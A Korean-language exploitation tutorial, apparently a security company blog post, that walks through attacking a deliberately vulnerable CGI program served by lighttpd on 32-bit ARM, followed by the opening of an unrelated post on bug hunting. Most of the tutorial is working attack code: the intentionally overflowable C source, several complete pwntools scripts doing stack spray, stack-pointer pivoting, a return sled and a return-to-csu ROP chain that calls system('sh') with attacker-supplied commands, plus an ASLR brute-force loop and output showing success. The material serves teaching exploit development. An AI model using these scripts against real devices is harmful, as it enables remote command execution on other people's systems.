+Lighttpd1와 같이 HTTP 프로토콜을 처리하여 CGI 프로그램으로 전달 할 수 있는 웹 서버 역할을 하는 프로그램을 한가지 선정합니다. 그 후에 CGI 규약에 맞게 프로그램을 작성하면 됩니다. 본 챕터에서는 공격하기 위해 알아야하는 몇가지를 설명하겠습니다.
+ +환경변수에는 HTTP 프로토콜을 통해 클라이언트에게 제공받은 정보가 저장됩니다.
+ +임의로 변조된 사용자의 값이 전달 될 수 있는 벡터는 다음과 같습니다.2
+ +HTTP_COOKIE : 클라이언트의 Cookie입니다.HTTP_USER_AGENT : 클라이언트의 User agent입니다.QUERY_STRING : 클라이언트에게 제공받은 GET 쿼리 문자열입니다.표준 출력을 통해 cgi 페이지로 접근한 클라이언트에게 그 내용을 전달할 수 있습니다.
+ +POST와 같은 HTTP Method를 서비스 하기 위해 CGI에서는 표준입력을 사용합니다. POST의 데이터를 전달 받기 위해서는 단순히 표준입력을 받기만 하면 우리는 POST를 통해 전달 된 데이터를 받아낼 수 있습니다.
vuln.c
+ +#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+char *param;
+int param_count;
+
+static inline char h2c(char h) // F -> 15
+{
+ if (h >= 'a' && h <= 'f')
+ return h - 'a' + 0xa;
+ if (h >= 'A' && h <= 'F')
+ return h - 'A' + 0xa;
+ return h - '0';
+}
+
+char u2c(char *u) // %00 -> \x00
+{
+ char ret = 0;
+
+ if (*u == '%')
+ {
+ ret += h2c(*(u+1)) * 0x10;
+ ret += h2c(*(u+2)) * 0x01;
+ }
+
+ return ret;
+}
+
+int urldecode(char *s)
+{
+ int index1 = 0;
+ int index2 = 0;
+
+ if (!s)
+ return 1;
+
+ if (s[index2] == '?')
+ index2++;
+
+ param = s;
+ param_count = 0;
+
+ while (s[index2])
+ {
+ if (s[index2] == '%')
+ {
+ s[index1++] = u2c(s+index2);
+ index2 += 3;
+ }
+ else if (s[index2] == '&')
+ {
+ s[index1++] = '\0';
+ index2++;
+ }
+ else
+ {
+ if (s[index2] == '=')
+ param_count++;
+ s[index1++] = s[index2++];
+ }
+ }
+
+ s[index1] = '\0';
+
+ return 0;
+}
+
+int get_val(char *name, char *dest, size_t size)
+{
+ int err = 1;
+ char *param_c = param;
+ size_t param_len = strlen(param_c);
+ size_t name_len = strlen(name);
+
+ if (!param || !param_count)
+ {
+ printf("no query.\n");
+ return 1;
+ }
+
+ for (int i = 0; i < param_count; i++)
+ {
+ if (!memcmp(name, param_c, name_len) && param_c[name_len] == '=')
+ {
+ param_c += name_len + 1;
+ strncpy(dest, param_c, size);
+ err = 0;
+ break;
+ }
+ else
+ {
+ param_c += param_len+1;
+ param_len = strlen(param_c);
+ }
+ }
+
+ return err;
+}
+
+int main(int argc, char **argv, char **envp)
+{
+ char out[512];
+ char cmd[256];
+ char buf[256];
+
+ if (urldecode(getenv("QUERY_STRING")))
+ {
+ printf("urldecode error.\n");
+ return -1;
+ }
+
+ memset(out, 0, sizeof(out));
+ memset(cmd, 0, sizeof(cmd));
+ memset(buf, 0, sizeof(buf));
+
+ if (!get_val("time", buf, sizeof(buf)) && buf[0] == 'y')
+ strcat(cmd, "echo '- time ------' >> /tmp/out && date >> /tmp/out;");
+ if (!get_val("ifconfig", buf, sizeof(buf)) && buf[0] == 'y')
+ strcat(cmd, "echo '- ifconfig --' >> /tmp/out && ifconfig bond0 >> /tmp/out;");
+ if (!get_val("uname", buf, sizeof(buf)) && buf[0] == 'y')
+ strcat(cmd, "echo '- uname -----' >> /tmp/out && uname -a >> /tmp/out;");
+
+ system("rm -f /tmp/out");
+ system(cmd);
+
+ int fd;
+ if ((fd = open("/tmp/out", O_RDONLY)) < 0)
+ return -1;
+ read(fd, out, sizeof(out));
+ close(fd);
+
+ if (!get_val("comment", buf, 0x100))
+ strcat(out, buf);
+
+ puts(out);
+ return 0;
+}
+위 샘플 코드는 시스템의 time, ifconfig, uname의 결과값을 출력 해 주는 간단한 프로그램입니다.
L109
+QUERY_STRING을 통해 인풋 받는 GET Query의 디코딩을 처리합니다.L119~124
+time, ifconfig, uname을 실행하는 명령어 조합을 cmd 버퍼에 복사합니다.L126~127
+/tmp/out을 삭제 후 cmd 버퍼의 내용대로 명령어를 실행합니다.L129~133
+/tmp/out 파일을 읽어 out버퍼에 복사합니다.L135~136
+comment 의 값이 유효할 경우 그 값을 out 버퍼에 복사합니다.L138
+out을 출력합니다.L136에서 strncat 대신 strcat3을 사용하기 때문에, out 버퍼에 이미 많은 양의 데이터가 채워져 있을 경우의 예외를 처리하지 않습니다. 이로 인해 Buffer overflow4가 발생하게 됩니다.
취약점을 증명하기 위해 간단히 웹 브라우저를 사용할 수 있습니다.
+ +
위는 정상적인 프로그램의 실행 흐름을 나타냅니다.
+ +
위는 다수의 데이터를 comment 파라미터를 통해 전달 할 경우를 보여줍니다.
Lighttpd의 경우 다음과 같이 core dump를 활성화 시킬 수 있습니다. cgi 프로그램이 존재하는 디렉토리에 core dump가 생성됩니다.
+ +$ echo 'server.core-files = "enable"' >> /etc/lighttpd.conf
+$ kill -9 `pidof lighttpd`
+$ lighttpd -f /etc/lighttpd.conf -m /usr/local/lib
+그 후, 해당 프로그램의 core dump를 확인합니다.
+ +/home/314ckC47 # ./gdb -q -c /path/to/core
+[New LWP 6007]
+Core was generated by `vuln.cgi'.
+Program terminated with signal 11, Segmentation fault.
+#0 0x61616160 in ?? ()
+(gdb) i r pc
+pc 0x61616160 0x61616160
+$pc 레지스터가 변조 된 것을 알 수 있습니다.
일반적인 BOF 공격은 Return Oriented Programming(ROP)5을 주로 사용합니다.
+ +하지만 이번 취약점을 공격하기에는 몇가지 제약이 있습니다.
+ +이런 상황에서 구상할 수 있는 Payload는 다음과 같습니다.
+ +<= 0x00000000 0xffffffff =>
++-----+-(out)---------------+-(BP)-+-(PC)-+-----+
+| ... | ............ 'a'*63 | BASE | JUMP | ... |
++-----+---------------------+------+------+-----+
+ === Overflow ==>
+JUMP에는 상위 1바이트가 Null-byte인 주소값을 삽입할 수 있습니다.BASE에는 Null-byte가 존재하지 않는 어떤 값을 삽입할 수 있습니다.이런 모든 조건을 종합 해 보았을 때, 우리는 다음과 같이 공격을 구상해야합니다.
+ +PC를 단 한번 변조하여 공격자가 원하는 코드의 흐름을 획득 해야합니다.
+ SP를 변조할 수 있어야 합니다.QUERY_STRING 환경변수는 스택에 저장되어 있습니다. 이를 활용하면 다음과 같이 Stack spray를 시도 할 수 있습니다.
#!/usr/bin/python3
+
+from pwn import *
+
+e = ELF("./vuln")
+
+def form_packet(ip, param):
+ packet = ""
+ packet += "GET http://{}/vuln.cgi?{} HTTP/1.1\r\n".format(ip, param)
+ packet += "Host: {}\r\n".format(ip)
+ packet += "Connection: keep-alive\r\n"
+ packet += "Content-Length: 0\r\n"
+ packet += "User-Agent: Mozilla/5.0\r\n"
+ packet += "Accept: */*\r\n"
+ packet += "Origin: http://{}\r\n".format(ip)
+ packet += "Referer: http://{}/home.cgi\r\n".format(ip)
+ packet += "Accept-Encoding: gzip, deflate\r\n"
+ packet += "Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7\r\n"
+ packet += "\r\n"
+ return packet.encode()
+
+def form_param(payload, spray):
+ return "&".join(["ifconfig=y", "comment="+payload, "s="+spray])
+
+def exploit(ip):
+ payload = 'a'*63 + "STCK" + "JUMP"
+ spray = 'b'*0x10000
+ param = form_param(payload, spray)
+ packet = form_packet(ip, param)
+
+ p = remote(ip, 80)
+ p.send(packet)
+ r = p.recv(1024).decode()
+ log.info(r)
+ p.close()
+
+if __name__ == "__main__":
+ if (len(sys.argv) == 2):
+ exploit(sys.argv[1])
+ else:
+ print("{} [target-ip]".format(sys.argv[0]))
+실제로 스택에 스프레이가 되었는지 확인합니다.
+ +(gdb) x/16wx $sp+0x380
+0xbec65db8: 0x61616161 0x61616161 0x61616161 0x61616161
+0xbec65dc8: 0x64646161 0x44446464 0x73004444 0x6262623d
+0xbec65dd8: 0x62626262 0x62626262 0x62626262 0x62626262
+0xbec65de8: 0x62626262 0x62626262 0x62626262 0x62626262
+(gdb) x/16wx $sp+0x380+0x10000
+0xbec75db8: 0x62626262 0x62626262 0x62626262 0x62626262
+0xbec75dc8: 0x62626262 0x62626262 0x62626262 0x45520062
+0xbec75dd8: 0x53455551 0x52555f54 0x762f3d49 0x2e6e6c75
+0xbec75de8: 0x3f696763 0x6f636669 0x6769666e 0x6326793d
+(gdb)
+스프레이가 잘 되었음을 확인 했습니다.
+ +또한 Null-byte의 삽입이 가능한지의 여부를 확인합니다.
+ +# ...
+def exploit(ip):
+ payload = 'a'*63 + 'dddd' + 'DDDD'
+ spray = '%00'*4 + 'b'*(0x10000-12)
+ param = form_param(payload, spray)
+ packet = form_packet(ip, param)
+# ...
+4바이트의 null을 삽입 해 봅니다.
+ +(gdb) x/16wx $sp+0x380
+0xbed44db8: 0x61616161 0x61616161 0x61616161 0x61616161
+0xbed44dc8: 0x64646161 0x44446464 0x73004444 0x0000003d
+0xbed44dd8: 0x62626200 0x62626262 0x62626262 0x62626262
+0xbed44de8: 0x62626262 0x62626262 0x62626262 0x62626262
+(gdb) x/16wx $sp+0x380+0x10000
+0xbed54db8: 0x62626262 0x62626262 0x62626262 0x62626262
+0xbed54dc8: 0x62626262 0x62620062 0x62626262 0x45520062
+0xbed54dd8: 0x53455551 0x52555f54 0x762f3d49 0x2e6e6c75
+0xbed54de8: 0x3f696763 0x6f636669 0x6769666e 0x6326793d
+(gdb)
+Null-byte를 삽입할 수 있는 영역임을 확인 했습니다.
+ +armv7에서 R11 레지스터는 x86의 ebp와 같은 역할을 수행합니다.
(gdb) disas main
+...
+ 0x00010c9c <+624>: mov r0, r3 // -- main epilogue --
+ 0x00010ca0 <+628>: sub sp, r11, #4 // r11(bp)에서 4를 뺀 값을 sp에 저장합니다.
+ 0x00010ca4 <+632>: pop {r11, pc} // 스택에서 r11, pc를 순차적으로 pop합니다.
+...
+이를 활용하면 Stack pointer(sp)를 변조할 수 있습니다.
아래와 같은 순서의 명령을 수행한다고 가정합니다.
+ +### Stage 1 ######################################################
++-Code-------------+---------------------------------------------+
+| pc > 0x00010ca0 | sub sp, r11, #4 |
+| 0x00010ca4 | pop {r11, pc} |
++------------------+---------------------------------------------+
++-Stack------------+----------0----------4----------8----------c-+
+| 0xbfff8f00 | 0x00000000 0x00000000 0x00000000 0x00000000 |
+| 0xbfff8f10 | 0xbfff8f24 0x00010ca0 0x00000000 0x00000000 |
+| 0xbfff8f20 | 0x41414141 0x41414141 0x41414141 0x41414141 |
++------------------+---------------------------------------------+
++-Register-------------------------------------------------------+
+| sp 0xbfff8f00 |
+| r11 0xbfff8f14 |
++----------------------------------------------------------------+
+
+### Stage 2 ######################################################
++-Code-------------+---------------------------------------------+
+| 0x00010ca0 | sub sp, r11, #4 |
+| pc > 0x00010ca4 | pop {r11, pc} |
++------------------+---------------------------------------------+
++-Stack------------+----------0----------4----------8----------c-+
+| 0xbfff8f00 | 0x00000000 0x00000000 0x00000000 0x00000000 |
+| 0xbfff8f10 | 0xbfff8f24 0x00010ca0 0x00000000 0x00000000 |
+| 0xbfff8f20 | 0x41414141 0x41414141 0x41414141 0x41414141 |
++------------------+---------------------------------------------+
++-Register-------------------------------------------------------+
+| sp 0xbfff8f10 * |
+| r11 0xbfff8f14 |
++----------------------------------------------------------------+
+* r11에서 4를 뺀 값을 sp에 넣었습니다.
+
+### Stage 3 ######################################################
++-Code-------------+---------------------------------------------+
+| pc > 0x00010ca0 | sub sp, r11, #4 |
+| 0x00010ca4 | pop {r11, pc} |
++------------------+---------------------------------------------+
++-Stack------------+----------0----------4----------8----------c-+
+| 0xbfff8f00 | 0x00000000 0x00000000 0x00000000 0x00000000 |
+| 0xbfff8f10 | 0xbfff8f24 0x00010ca0 0x00000000 0x00000000 |
+| 0xbfff8f20 | 0x41414141 0x41414141 0x41414141 0x41414141 |
++------------------+---------------------------------------------+
++-Register-------------------------------------------------------+
+| sp 0xbfff8f10 |
+| r11 0xbfff8f24 * |
++----------------------------------------------------------------+
+* sp(0xbfff8f10)에서 r11, pc를 pop 했습니다.
+
+### Stage 4 ######################################################
++-Code-------------+---------------------------------------------+
+| 0x00010ca0 | sub sp, r11, #4 |
+| pc > 0x00010ca4 | pop {r11, pc} |
++------------------+---------------------------------------------+
++-Stack------------+----------0----------4----------8----------c-+
+| 0xbfff8f00 | 0x00000000 0x00000000 0x00000000 0x00000000 |
+| 0xbfff8f10 | 0xbfff8f24 0x00010ca0 0x00000000 0x00000000 |
+| 0xbfff8f20 | 0x41414141 0x41414141 0x41414141 0x41414141 |
++------------------+---------------------------------------------+
++-Register-------------------------------------------------------+
+| sp 0xbfff8f20 * |
+| r11 0xbfff8f24 |
++----------------------------------------------------------------+
+* r11에서 4를 뺀 값을 sp에 넣었습니다.
+ sp의 값이 우리가 원하는 값(0xbfff8f20)으로 변조되었습니다.
+
+### Stage 5 ######################################################
++-Code-------------+---------------------------------------------+
+| pc > 0x41414141 | ........................................... |
++------------------+---------------------------------------------+
++-Stack------------+----------0----------4----------8----------c-+
+| 0xbfff8f00 | 0x00000000 0x00000000 0x00000000 0x00000000 |
+| 0xbfff8f10 | 0xbfff8f24 0x00010ca0 0x00000000 0x00000000 |
+| 0xbfff8f20 | 0x41414141 0x41414141 0x41414141 0x41414141 |
++------------------+---------------------------------------------+
++-Register-------------------------------------------------------+
+| sp 0xbfff8f28 |
+| r11 0x41414141 |
++----------------------------------------------------------------+
+* pc와 r11이 변조되었습니다.
+위와 같은 방법으로 연속적인 함수의 호출 또는 인자의 구성을 위해 SP를 변조할 수 있습니다.
위 두가지 방법을 이용하면 다음과 같은 흐름으로 공격을 수행합니다.
+ +QUERY_STRING을 전달함으로 BOF를 발생시키고, 스택에 ROP Payload를 spray합니다.SP를 Stack spray된 영역으로 변조합니다.SP가 잘못된 영역을 역참조 할 수 있습니다. 이럴경우, 1을 다시 수행합니다.다음과 같이 ASLR을 비활성화 할 수 있습니다.
+ +# echo 0 > /proc/sys/kernel/randomize_va_space
+# cat /proc/sys/kernel/randomize_va_space
+0
+ASLR이 비활성화 된 후, 스프레이를 먼저 수행하여 core dump를 확인합니다.
+ +(gdb) x/32wx $sp+0x380
+0xbefe1d98: 0x6161616b 0x6161616c 0x6161616d 0x6161616e
+0xbefe1da8: 0xbefe1ddc 0x44444444 0x3d737300 0x41414141
+0xbefe1db8: 0x41414141 0x41414141 0x41414141 0x41414141
+0xbefe1dc8: 0x41414141 0x41414141 0x41414141 0x41414141
+0xbefe1dd8: 0x41414141 0x41414141 0x41414141 0x41414141
+Stack spray가 0xbefe1db4에서 시작합니다. 해당 주소로 sp를 변조합니다.
SPRAY_LEN = 0xf000
+leave = 0x00010ca0 # sub sp, r11, 4; pop {r11, pc}
+
+def payload(r11, lr, dummy_len):
+ payload = cyclic(dummy_len).decode()
+ payload += purl32(r11)
+ payload += purl32(lr)
+ return payload
+
+def spray():
+ spray = "A"*SPRAY_LEN
+ return spray
+
+def exploit():
+# ...
+ stack = 0xbefe1db4+4
+ pload = payload(stack, leave, dummy_len)
+ param = form_param(pload, spray())
+ packet = form_packet(ip, param, command)
+# ...
+위의 코드를 실행 후 다시 gdb로 확인합니다.
(gdb) x/16wx $sp-0x10
+0xbefe1dac: 0x00010ca0 0x3d737300 0x41414141 0x41414141
+0xbefe1dbc: 0x41414141 0x41414141 0x41414141 0x41414141
+0xbefe1dcc: 0x41414141 0x41414141 0x41414141 0x41414141
+0xbefe1ddc: 0x41414141 0x41414141 0x41414141 0x41414141
+(gdb) i r pc
+pc 0x41414140 0x41414140
+(gdb)
+정상적으로 pc가 변조되었습니다.
Return sled를 이용하여 스프레이한 영역의 어느곳으로 sp, pc가 변조되어도 공격자의 ROP Payload가 실행되도록 합니다.
0x00010ca4: pop {r11, pc}
+0x000108e0: pop {r4, r11, pc}
+위의 두 가젯을 활용합니다.
+ + ...
+| 0x00010ca4
+| 0x00010ca4
+| 0x000108e0
+| 0x00010ca4 # r4
+| 0x41414141 # r11
+V [ROP HERE] # pc
+def spray():
+ # ...
+ spray += purl32(sled_1) * (((SPRAY_LEN-len(rop)) // EADDR_LEN)-3)
+ spray += purl32(sled_2) + purl32(sled_1) + "AAAA"
+ spray += rop
+
+ return spray
+Return-to-csu를 활용합니다.
+ +def chain(func, r0, r1, r2):
+ c = ''
+ c += purl32(0x00000000) # r4
+ c += purl32(func) # [r5] => r3
+ c += purl32(0x00000000) # r6
+ c += purl32(r0) # r7 => r0
+ c += purl32(r1) # r8 => r1
+ c += purl32(r2) # r9 => r2
+ c += purl32(0x00000000) # r10
+ c += purl32(csu_2) # pc
+ return c
+
+def spray():
+ #...
+ # Return-to-csu.
+ rop = purl32(csu_1)
+
+ # Set bss:0x20 to get_val address.
+ for i in range(4):
+ addr = e.bss(0x20+i)
+ value = e.symbols['get_val'] >> (i*8) & 0xff
+ rop += chain(e.got['memset'], addr, value, 1)
+
+ # get_val("t", bss:0x24, 2): returns "sh"
+ rop += chain(e.bss(0x20), str_t, e.bss(0x24), 2) # get_val
+ rop += chain(e.got['system'], e.bss(0x24), 0, 0)
+ #...
+chain() 함수는 Return-to-csu 가젯을 자동으로 구성 해 줍니다.L18~22 : bss:0x20 지점에 get_val 함수의 포인터를 작성합니다.L25 : get_val 함수를 이용해 QUERY_STRING에서 t 쿼리의 값을 bss:0x24 지점에 작성합니다. 그 값은 "sh" 입니다.L26 : system 함수를 이용해 쉘을 실행시킵니다.ROP Payload가 수행되고 나면, 쉘 프로세스가 실행되고, 명령어 입력까지 대기합니다.
+ +POST 메소드를 이용해 Standard input으로 쉘 명령을 전달하여 실행시킵니다.
def form_packet(ip, param, content=''):
+ packet = ""
+ packet += "POST http://{}/vuln.cgi?{} HTTP/1.1\r\n".format(ip, param)
+ packet += "Host: {}\r\n".format(ip)
+ packet += "Connection: keep-alive\r\n"
+ packet += "Content-Length: {}\r\n".format(len(content))
+ packet += "User-Agent: Mozilla/5.0\r\n"
+ packet += "Accept: */*\r\n"
+ packet += "Origin: http://{}\r\n".format(ip)
+ packet += "Referer: http://{}/home.cgi\r\n".format(ip)
+ packet += "Accept-Encoding: gzip, deflate\r\n"
+ packet += "Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7\r\n"
+ packet += "\r\n"
+ packet += content
+ packet += "\r\n"
+ return packet.encode()
+def exploit(ip, command):
+
+ # ifconfig's output length is not fixed.
+ # So, we need to get the buffer first to calculate
+ # the overflow size.
+ log.info("Getting buffer.")
+ packet = form_packet(ip, form_param())
+ p = remote(ip, 80)
+ p.send(packet)
+ r = p.recv().decode()
+ r = r[r.find("- ifconfig"):r.find("\n\n\n")+2]
+ dummy_len = 0x204 - len(r)
+ p.close()
+
+ log.info("Exploit.")
+ stack = 0xbefe1db4+4
+ pload = payload(stack, leave, dummy_len)
+ param = form_param(pload, spray())
+ packet = form_packet(ip, param, command)
+ p = remote(ip, 80)
+ p.send(packet)
+ p.close()
+
+ log.info("Success!")
+ifconfig 명령의 출력값의 길이가 고정되어있지 않습니다.
오버플로우 사이즈를 안정적으로 계산하기 위해 ifconfig 명령 결과 버퍼의 길이값을 측정하고, 계산합니다.
#!/usr/bin/python3
+
+from pwn import *
+
+e = ELF("./vuln")
+
+# Globals & Defines
+spray_fix = ''
+SPRAY_LEN = 0xf000
+EADDR_LEN = 12
+
+# Gadgets
+sled_1 = 0x00010ca4 # pop {r11, pc}
+sled_2 = 0x000108e0 # pop {r4, r11, pc}
+csu_1 = 0x00010d28
+csu_2 = 0x00010d0c
+leave = 0x00010ca0 # sub sp, r11, 4; pop {r11, pc}
+
+# ETC.
+str_t = 0x10e66
+
+def purl32(value):
+ a = (value & 0x000000ff) >> 0
+ b = (value & 0x0000ff00) >> 8
+ c = (value & 0x00ff0000) >> 16
+ d = (value & 0xff000000) >> 24
+ return "%{:02x}%{:02x}%{:02x}%{:02x}".format(a,b,c,d)
+
+def form_packet(ip, param, content=''):
+ packet = ""
+ packet += "POST http://{}/vuln.cgi?{} HTTP/1.1\r\n".format(ip, param)
+ packet += "Host: {}\r\n".format(ip)
+ packet += "Connection: keep-alive\r\n"
+ packet += "Content-Length: {}\r\n".format(len(content))
+ packet += "User-Agent: Mozilla/5.0\r\n"
+ packet += "Accept: */*\r\n"
+ packet += "Origin: http://{}\r\n".format(ip)
+ packet += "Referer: http://{}/home.cgi\r\n".format(ip)
+ packet += "Accept-Encoding: gzip, deflate\r\n"
+ packet += "Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7\r\n"
+ packet += "\r\n"
+ packet += content
+ packet += "\r\n"
+ return packet.encode()
+
+def form_param(payload='', spray=''):
+ p = ["t=sh", "ifconfig=y"]
+ if payload:
+ p.append("comment="+payload)
+ if spray:
+ p.append("ss="+spray)
+ return "&".join(p)
+
+def payload(r11, lr, dummy_len=54):
+ payload = cyclic(dummy_len).decode()
+ payload += purl32(r11)
+ payload += purl32(lr)
+ return payload
+
+def chain(func, r0, r1, r2):
+ c = ''
+ c += purl32(0x00000000) # r4
+ c += purl32(func) # [r5] => r3
+ c += purl32(0x00000000) # r6
+ c += purl32(r0) # r7 => r0
+ c += purl32(r1) # r8 => r1
+ c += purl32(r2) # r9 => r2
+ c += purl32(0x00000000) # r10
+ c += purl32(csu_2) # pc
+ return c
+
+def spray():
+
+ # If we already got spray buffer, use it.
+ global spray_fix
+ if len(spray_fix):
+ return spray_fix
+
+ # Return-to-csu.
+ rop = purl32(csu_1)
+
+ # Set bss:0x20 to get_val address.
+ for i in range(4):
+ addr = e.bss(0x20+i)
+ value = e.symbols['get_val'] >> (i*8) & 0xff
+ rop += chain(e.got['memset'], addr, value, 1)
+
+ # get_val("t", bss:0x24, 2): returns "sh"
+ rop += chain(e.bss(0x20), str_t, e.bss(0x24), 2) # get_val
+
+ # system("sh")
+ rop += chain(e.got['system'], e.bss(0x24), 0, 0)
+
+ # Forming spray.
+ spray = 'a' * (SPRAY_LEN % EADDR_LEN) # padd
+ spray += purl32(sled_1) * (((SPRAY_LEN-len(rop)) // EADDR_LEN)-3)
+ spray += purl32(sled_2) + purl32(sled_1) + "AAAA"
+ spray += rop
+
+ # Fix the spray buffer.
+ spray_fix = spray
+
+ return spray
+
+def exploit(ip, command):
+
+ # ifconfig's output length is not fixed.
+ # So, we need to get the buffer first to calculate
+ # the overflow size.
+ log.info("Getting buffer.")
+ packet = form_packet(ip, form_param())
+ p = remote(ip, 80)
+ p.send(packet)
+ r = p.recv().decode()
+ r = r[r.find("- ifconfig"):r.find("\n\n\n")+2]
+ dummy_len = 0x204 - len(r)
+ p.close()
+
+ log.info("Exploit.")
+ stack = 0xbefe1db4+4
+ pload = payload(stack, leave, dummy_len)
+ param = form_param(pload, spray())
+ packet = form_packet(ip, param, command)
+ p = remote(ip, 80)
+ p.send(packet)
+ p.close()
+
+ log.info("Success!")
+
+if __name__ == "__main__":
+ if (len(sys.argv) == 3):
+ exploit(sys.argv[1], sys.argv[2])
+ else:
+ print("{} [target-ip] [shell command]".format(sys.argv[0]))
+bc@machine $ ./exploit.py 172.16.13.9 'echo PWNED > /tmp/pwned'
+[*] '/mnt/c/Users/314ckC47/Documents/CGI Exploitation/source/vuln'
+ Arch: arm-32-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x10000)
+[*] Getting buffer.
+[*] Exploit.
+[*] Success!
+/home/314ckC47 $ cat /tmp/pwned
+PWNED
+다음과 같이 ASLR을 활성화합니다.
+ +# echo 0 > /proc/sys/kernel/randomize_va_space
+# cat /proc/sys/kernel/randomize_va_space
+0
+sp가 참조하는 지점에 대해 Brute-forcing을 수행합니다.
+Brute-forcing의 종료 조건을 위해 ROP Payload가 성공적으로 수행 될 경우 프로그램을 abort시켜 500 Internal error를 발생시키지 않도록 합니다.
# system("sh")
+ rop += chain(e.got['system'], e.bss(0x24), 0, 0)
+
+ # abort
+ rop += "AAAA"*7 + purl32(abort)
+#!/usr/bin/python3
+
+from pwn import *
+
+e = ELF("./vuln")
+
+# Globals & Defines
+spray_fix = ''
+SPRAY_LEN = 0xf000
+EADDR_LEN = 12
+
+# Gadgets
+sled_1 = 0x00010ca4 # pop {r11, pc}
+sled_2 = 0x000108e0 # pop {r4, r11, pc}
+csu_1 = 0x00010d28
+csu_2 = 0x00010d0c
+leave = 0x00010ca0 # sub sp, r11, 4; pop {r11, pc}
+
+# ETC.
+str_t = 0x00010e66
+abort = 0x0001055c
+
+def purl32(value):
+ a = (value & 0x000000ff) >> 0
+ b = (value & 0x0000ff00) >> 8
+ c = (value & 0x00ff0000) >> 16
+ d = (value & 0xff000000) >> 24
+ return "%{:02x}%{:02x}%{:02x}%{:02x}".format(a,b,c,d)
+
+def form_packet(ip, param, content=''):
+ packet = ""
+ packet += "POST http://{}/vuln.cgi?{} HTTP/1.1\r\n".format(ip, param)
+ packet += "Host: {}\r\n".format(ip)
+ packet += "Connection: keep-alive\r\n"
+ packet += "Content-Length: {}\r\n".format(len(content))
+ packet += "User-Agent: Mozilla/5.0\r\n"
+ packet += "Accept: */*\r\n"
+ packet += "Origin: http://{}\r\n".format(ip)
+ packet += "Referer: http://{}/home.cgi\r\n".format(ip)
+ packet += "Accept-Encoding: gzip, deflate\r\n"
+ packet += "Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7\r\n"
+ packet += "\r\n"
+ packet += content
+ packet += "\r\n"
+ return packet.encode()
+
+def form_param(payload='', spray=''):
+ p = ["t=sh", "ifconfig=y"]
+ if payload:
+ p.append("comment="+payload)
+ if spray:
+ p.append("ss="+spray)
+ return "&".join(p)
+
+def payload(r11, lr, dummy_len=54):
+ payload = cyclic(dummy_len).decode()
+ payload += purl32(r11)
+ payload += purl32(lr)
+ return payload
+
+def chain(func, r0, r1, r2):
+ c = ''
+ c += purl32(0x00000000) # r4
+ c += purl32(func) # [r5] => r3
+ c += purl32(0x00000000) # r6
+ c += purl32(r0) # r7 => r0
+ c += purl32(r1) # r8 => r1
+ c += purl32(r2) # r9 => r2
+ c += purl32(0x00000000) # r10
+ c += purl32(csu_2) # pc
+ return c
+
+def spray():
+
+ # If we already got spray buffer, use it.
+ global spray_fix
+ if len(spray_fix):
+ return spray_fix
+
+ # Return-to-csu.
+ rop = purl32(csu_1)
+
+ # Set bss:0x20 to get_val address.
+ for i in range(4):
+ addr = e.bss(0x20+i)
+ value = e.symbols['get_val'] >> (i*8) & 0xff
+ rop += chain(e.got['memset'], addr, value, 1)
+
+ # get_val("t", bss:0x24, 2): returns "sh"
+ rop += chain(e.bss(0x20), str_t, e.bss(0x24), 2) # get_val
+
+ # system("sh")
+ rop += chain(e.got['system'], e.bss(0x24), 0, 0)
+
+ # abort
+ rop += "AAAA"*7 + purl32(abort)
+
+ # Forming spray.
+ spray = 'a' * (SPRAY_LEN % EADDR_LEN) # padd
+ spray += purl32(sled_1) * (((SPRAY_LEN-len(rop)) // EADDR_LEN)-3)
+ spray += purl32(sled_2) + purl32(sled_1) + "AAAA"
+ spray += rop
+
+ # Fix the spray buffer.
+ spray_fix = spray
+
+ return spray
+
+def exploit(ip, command):
+
+ # ifconfig's output length is not fixed.
+ # So, we need to get the buffer first to calculate
+ # the overflow size.
+ log.info("Getting buffer.")
+ packet = form_packet(ip, form_param())
+ p = remote(ip, 80)
+ p.send(packet)
+ r = p.recv().decode()
+ r = r[r.find("- ifconfig"):r.find("\n\n\n")+2]
+ dummy_len = 0x204 - len(r)
+ p.close()
+
+ log.info("Exploit.")
+ while True:
+ stack = 0xbefe1dd4
+ pload = payload(stack, leave, dummy_len)
+ param = form_param(pload, spray())
+ packet = form_packet(ip, param, command)
+ p = remote(ip, 80)
+ p.send(packet)
+ r = p.recv()
+ p.close()
+ if r.find(b"200 OK") != -1:
+ break
+
+ log.info("Success!")
+
+if __name__ == "__main__":
+ if (len(sys.argv) == 3):
+ exploit(sys.argv[1], sys.argv[2])
+ else:
+ print("{} [target-ip] [shell command]".format(sys.argv[0]))
+CGI를 공격하는 방법에 대해 알아보았습니다. 일반적으로 웹 CGI 프로그램 혹은 CGI는 문자열을 처리하는 코드가 많습니다. 문자열을 처리하는 코드에서 주로 발생할 수 있는 String copy buffer overflow의 공격 방법에 대해 알아보았고, 안정적인 공격 코드를 작성하는 법에 대해 알아 보았습니다.
+ +추가적인 질문 사항과 수정사항은 dhkim@stealien.com으로 남겨 주시면 감사하겠습니다.
+ +https://www.lighttpd.net/ ↩
+
+
+
+
+
+ 
+ 오우진
+ 많은 주니어 해커들은 CTF로 해킹을 배운다. 나 역시도 많은 CTF를 참여하며 실력을 키워나갔다. CTF는 제한된 시간안에 많은 지식을 배울수있는 좋은 “Play”다. 하지만 리얼월드와 상당한 괴리감이 존재한다고 생각한다. 내가 CTF에서 일명 고인물이 돼가는 시점에서 버그헌팅을 시작했을때 정말 막막했다. 어떤 소프트웨어를 대상으로 할지도 몰랐고 Fuzzer를 만들어야될지 순수 오디팅으로 찾아야될지 선택하는것도 정말 어려웠다. CTF와 달리 버그헌팅은 명확한 Goal과 Methodology이 존재하지않았다.
+ +인터넷상에는 1day 분석글이나 Exploitation관한 기술론 밖에 없었다. 버그헌팅하는데에 많은 도움을 주었지만 처음시작하는 사람들에게는 이러한글보다 버그헌팅 스토리가 더 도움이 될거라고 생각한다.
+ +이 글에서는 기술적인 내용보다 내가 2019년부터 오늘날까지 버그헌팅을 하기위해 어떤노력을 하였고 어떻게 학습하였는지를 이야기할 것이다.
